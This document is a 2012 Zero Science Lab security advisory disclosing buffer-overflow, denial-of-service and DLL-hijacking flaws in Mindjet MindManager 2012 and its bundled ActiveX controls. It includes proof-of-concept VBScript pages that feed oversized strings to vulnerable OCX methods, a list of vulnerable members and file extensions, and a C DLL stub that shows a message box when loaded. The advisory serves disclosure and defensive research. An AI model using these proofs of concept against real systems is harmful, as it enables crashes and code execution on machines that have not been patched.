Mindjet MindManager 2012 v10.0.493 Multiple Remote Vulnerabilities

2012-01-31T00:00:00
ID ZSL-2012-5068
Type zeroscience
Reporter Gjoko Krstic
Modified 2012-01-31T00:00:00

Description

Title: Mindjet MindManager 2012 v10.0.493 Multiple Remote Vulnerabilities
Advisory ID: ZSL-2012-5068
Type: Local/Remote
Impact: System Access, DoS
Risk: (5/5)
Release Date: 31.01.2012

Summary

An intuitive visual framework that fosters clarity, innovative thinking & communication to improve business results.

Description

MindManager suffers from several vulnerabilities included into the whole package. Several OCX and DLL libraries from 3rd party software (glg.ocx, officeviewermme.ocx, pdfxctrl.dll, vsflex8n.ocx and ChartFX.ClientServer.Core.dll) are vulnerable to buffer overflow and denial of service (IE). Also the application is vulnerable to insecure library loading with every file extension thru ssgp.dll and dwmapi.dll.

Vendor

Mindjet - <http://www.mindjet.com>

Affected Version

10.0.493 (Windows)

Tested On

Microsoft Windows XP Professional SP3 (EN)

Vendor Status

N/A

PoC

mindmanager_mv.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://www.exploit-db.com/exploits/12673/>
[2] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php>
[3] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php>
[4] <http://packetstormsecurity.org/files/109293/ZSL-2012-5068>
[5] <http://secunia.com/advisories/47797/>
[6] <http://www.securityfocus.com/bid/51767>
[7] <http://cxsecurity.com/issue/WLB-2012020006>
[8] <http://osvdb.org/show/osvdb/78725>
[9] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4754>

Changelog

[31.01.2012] - Initial release
[01.02.2012] - Added reference [4], [5], [6] and [7]
[02.02.2012] - Added reference [8]
[24.11.2012] - Added reference [9]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            
Mindjet MindManager 2012 v10.0.493 Multiple Remote Vulnerabilities


Vendor: Mindjet
Product web page: http://www.mindjet.com
Affected version: 10.0.493 (Windows)

Summary: An intuitive visual framework that fosters clarity,
innovative thinking & communication to improve business results.

Desc: MindManager suffers from several vulnerabilities included
into the whole package. Several OCX and DLL libraries from 3rd
party software (glg.ocx, officeviewermme.ocx, pdfxctrl.dll, vsflex8n.ocx
and ChartFX.ClientServer.Core.dll) are vulnerable to buffer overflow
and denial of service (IE). Also the application is vulnerable to insecure
library loading with every file extension thru ssgp.dll and dwmapi.dll.

Tested on Microsoft Windows XP Professional SP3 (EN)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2012-5068
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5068.php


Other vulnerabilities:

http://www.exploit-db.com/exploits/12673/
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php


25.01.2012

---


&lt;object classid='clsid:74233DB3-F72F-44EA-94DC-258A624037E6' id='target' /&gt;
&lt;script language='vbscript'&gt;

targetFile = "C:\Program Files\Mindjet\MindManager 10\vsflex8n.ocx"
prototype  = "Sub Archive ( ByVal ArcFileName As String ,  ByVal FileName As String ,  ByVal Action As ArchiveSettings )"
memberName = "Archive"
progid     = "VSFlex8N.VSFlexGrid"
argCount   = 3

arg1=String(7188, "A")
arg2="defaultV"
arg3=1

target.Archive arg1 ,arg2 ,arg3 

&lt;/script&gt;

############

CompanyName		ComponentOne
FileDescription		VSFlexGrid8 (UNICODE)
FileVersion		8, 0, 20031, 172
InternalName		
LegalCopyright		Copyright 1999, 2002 ComponentOne
OriginalFileName		VSFlex8u.OCX
ProductName		VSFlexGrid8
ProductVersion		8, 0, 20031, 172

Report for Clsid: {74233DB3-F72F-44EA-94DC-258A624037E6}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  

############

------------------------------


&lt;object classid='clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C' id='target' /&gt;
&lt;script language='vbscript'&gt;

targetFile = "C:\Program Files\Mindjet\MindManager 10\ChartFX.ClientServer.Core.dll"
prototype  = "Property Let TipMask As String"
memberName = "TipMask"
progid     = "Cfx62ClientServer.Chart"
argCount   = 1

'arg1=String(13332, "A")
target.TipMask = arg1

&lt;/script&gt;


############

CompanyName		Software FX, Inc.
FileDescription		ChartFX Client Server
FileVersion		6.2.2089.27167
InternalName		ChartFX.ClientServer.Core.dll
LegalCopyright		Copyright 1993-2005 Software FX, Inc.
OriginalFileName		ChartFX.ClientServer.Core.dll
ProductName		ChartFX Client Server
ProductVersion		6.2

Report for Clsid: {E9DF30CA-4B30-4235-BF0C-7150F646606C}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  



Vulnerable members
--------------------
Function HitTestEx (
 	ByVal X  As Long , 
 	ByVal Y  As Long 
)  As _MouseEventArgsX

# vuln var: Y, X

-------------------------------------------
Sub OpenData (
 	ByVal COD As COD , 
 	ByVal n1  As Long , 
 	ByVal n2  As Long 
)

# vuln var: n1, n2

-------------------------------------------
Sub ShowPropertiesDialog (
 	ByVal context  As Variant , 
 	ByVal pageNumber  As Long 
)

# vuln var: pagenumber

-------------------------------------------

############

------------------------------

DLL Hijack:

Vulnerable extensions:
- .mmap
- .xmmap
- .xml
- .mmp
- .mmat
- .xmmat
- .mmpt
- .mmmp
- .xmmmp
- .mmas
- .xmmas
- .docx
- .dotx
- .doc
- .dot
- .mpx

(ssgp.dll / dwmapi.dll)

---

#include &lt;windows.h&gt;

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

------------------------------